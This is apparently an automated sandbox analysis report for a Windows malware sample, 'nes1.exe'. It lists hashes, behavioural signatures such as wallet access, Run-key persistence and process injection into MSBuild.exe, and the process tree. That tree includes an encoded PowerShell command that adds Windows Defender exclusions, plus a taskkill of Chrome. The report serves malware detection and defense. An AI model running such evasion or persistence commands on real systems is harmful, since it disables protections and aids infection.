Analysis
-
max time kernel
4294178s -
max time network
150s -
platform
windows7_x64 -
resource
win7-20220310-en -
submitted
13-03-2022 22:52
Static task
static1
Behavioral task
behavioral1
Sample
nes1.exe
Resource
win7-20220310-en
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
nes1.exe
Resource
win10v2004-en-20220113
windows10-2004_x64
0 signatures
0 seconds
General
-
Target
nes1.exe
-
Size
75KB
-
MD5
147e760e14fcb833dd6dba8aabfbe092
-
SHA1
8ae5369a8a95737a8efc4831f5a20ca6b2d959b6
-
SHA256
4d4f1d9ac5e7887dda018ea46753789a0c3d8e1199ea3c34502aa8da2136fe0e
-
SHA512
ebad6c551e11acef22e2952131e68dec9931a31f366d89f9d02ed63b3e479a8e6fa2eaa38b6d4c2885e1714e888124c207a7dbc4c15741f5cb11d8081d1198a5
Score
10/10
Malware Config
Signatures
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
nes1.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Windows\CurrentVersion\Run\applicationSU = "\"C:\\Users\\Admin\\AppData\\Roaming\\tmp1\\apps\\applicationSU.exe\"" nes1.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 10 eth0.me -
Suspicious use of SetThreadContext 1 IoCs
Processes:
nes1.exedescription pid process target process PID 2016 set thread context of 2040 2016 nes1.exe MSBuild.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Kills process with taskkill 1 IoCs
Processes:
taskkill.exepid process 852 taskkill.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes:
powershell.exenes1.exeMSBuild.exepid process 1100 powershell.exe 2016 nes1.exe 2016 nes1.exe 2040 MSBuild.exe 2040 MSBuild.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
Processes:
nes1.exepowershell.exeMSBuild.exetaskkill.exedescription pid process Token: SeDebugPrivilege 2016 nes1.exe Token: SeDebugPrivilege 1100 powershell.exe Token: SeDebugPrivilege 2040 MSBuild.exe Token: SeDebugPrivilege 852 taskkill.exe -
Suspicious use of WriteProcessMemory 17 IoCs
Processes:
nes1.exeMSBuild.exedescription pid process target process PID 2016 wrote to memory of 1100 2016 nes1.exe powershell.exe PID 2016 wrote to memory of 1100 2016 nes1.exe powershell.exe PID 2016 wrote to memory of 1100 2016 nes1.exe powershell.exe PID 2016 wrote to memory of 1100 2016 nes1.exe powershell.exe PID 2016 wrote to memory of 2040 2016 nes1.exe MSBuild.exe PID 2016 wrote to memory of 2040 2016 nes1.exe MSBuild.exe PID 2016 wrote to memory of 2040 2016 nes1.exe MSBuild.exe PID 2016 wrote to memory of 2040 2016 nes1.exe MSBuild.exe PID 2016 wrote to memory of 2040 2016 nes1.exe MSBuild.exe PID 2016 wrote to memory of 2040 2016 nes1.exe MSBuild.exe PID 2016 wrote to memory of 2040 2016 nes1.exe MSBuild.exe PID 2016 wrote to memory of 2040 2016 nes1.exe MSBuild.exe PID 2016 wrote to memory of 2040 2016 nes1.exe MSBuild.exe PID 2040 wrote to memory of 852 2040 MSBuild.exe taskkill.exe PID 2040 wrote to memory of 852 2040 MSBuild.exe taskkill.exe PID 2040 wrote to memory of 852 2040 MSBuild.exe taskkill.exe PID 2040 wrote to memory of 852 2040 MSBuild.exe taskkill.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\nes1.exe"C:\Users\Admin\AppData\Local\Temp\nes1.exe"1⤵
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2016 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACcAQwA6AFwAJwAsACcAQwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAFIAbwBhAG0AaQBuAGcAXAB0AG0AcAAxAFwAYQBwAHAAcwBcAGEAcABwAGwAaQBjAGEAdABpAG8AbgBTAFUALgBlAHgAZQAnAA==2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1100
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2040 -
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /im chrome.exe /f3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:852
-
-